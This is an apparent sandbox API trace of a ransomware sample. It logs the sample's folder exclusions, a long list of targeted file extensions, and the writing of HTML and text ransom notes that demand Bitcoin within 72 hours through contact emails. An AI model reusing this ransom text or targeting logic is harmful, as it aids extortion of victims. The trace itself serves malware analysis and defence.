	[0173.710] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340062, dwReserved1=0x7d0065, cFileName=".", cAlternateFileName="")) returned 0xfb91b0
	[0173.710] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\*.*") returned 97
	[0173.710] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.710] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*") returned 0x61
	[0173.710] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.711] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0173.711] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.711] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0173.711] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.711] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0173.711] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.711] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0173.712] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.712] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0173.712] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.712] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0173.712] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.712] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0173.712] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.713] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0173.713] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.713] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0173.713] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.713] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0173.713] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.713] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0173.713] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.714] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0173.714] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.714] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0173.714] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.714] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0173.714] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.714] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0173.714] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.715] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0173.715] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.715] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0173.715] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.715] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0173.715] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.715] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0173.716] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340062, dwReserved1=0x7d0065, cFileName="..", cAlternateFileName="")) returned 1
	[0173.722] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0c2408e, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0c2408e, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0c4a301, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x670, dwReserved0=0x340062, dwReserved1=0x7d0065, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0173.722] lstrcmpW (lpString1="Power_0.provxml", lpString2="..") returned 1
	[0173.722] lstrcmpW (lpString1="Power_0.provxml", lpString2=".") returned 1
	[0173.722] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\"
	[0173.722] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\", lpString2="Power_0.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml"
	[0173.722] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml") returned 109
	[0173.722] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.722] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\power_0.provxml") returned 0x6d
	[0173.723] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.723] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\power_0.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0173.723] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\power_0.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\power_0.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\power_0.provxml"
	[0173.723] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\power_0.provxml") returned 109
	[0173.723] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.723] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.723] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0173.724] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.724] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0173.724] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0c2408e, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0c2408e, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0c4a301, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x670, dwReserved0=0x340062, dwReserved1=0x7d0065, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 0
	[0173.724] FindClose (in: hFindFile=0xfb91b0 | out: hFindFile=0xfb91b0) returned 1
	[0173.724] FindClose (in: hFindFile=0xfb91b0 | out: hFindFile=0xfb91b0) returned 0
	[0173.725] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime"
	[0173.725] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\*.*"
	[0173.725] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.725] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.725] wsprintfW (in: param_1=0x188950, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT") returned 121
	[0173.726] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0173.728] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0173.728] WriteFile (in: hFile=0x39c, lpBuffer=0x187d08*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x188c2c, lpOverlapped=0x0 | out: lpBuffer=0x187d08*, lpNumberOfBytesWritten=0x188c2c*=0xc46, lpOverlapped=0x0) returned 1
	[0173.731] CloseHandle (hObject=0x39c) returned 1
	[0173.733] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187cd8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187cd8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.733] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.733] GetUserNameA (in: lpBuffer=0x187bbc, pcbBuffer=0x187cd4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187cd4) returned 1
	[0173.735] wsprintfW (in: param_1=0x188b58, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0173.735] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0173.735] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0173.735] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0173.735] WriteFile (in: hFile=0x39c, lpBuffer=0x188b58*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x188c34, lpOverlapped=0x0 | out: lpBuffer=0x188b58*, lpNumberOfBytesWritten=0x188c34*=0x30, lpOverlapped=0x0) returned 1
	[0173.736] CloseHandle (hObject=0x39c) returned 1
	[0173.736] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.736] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.736] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0173.736] wsprintfW (in: param_1=0x188910, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML") returned 122
	[0173.737] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0173.741] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
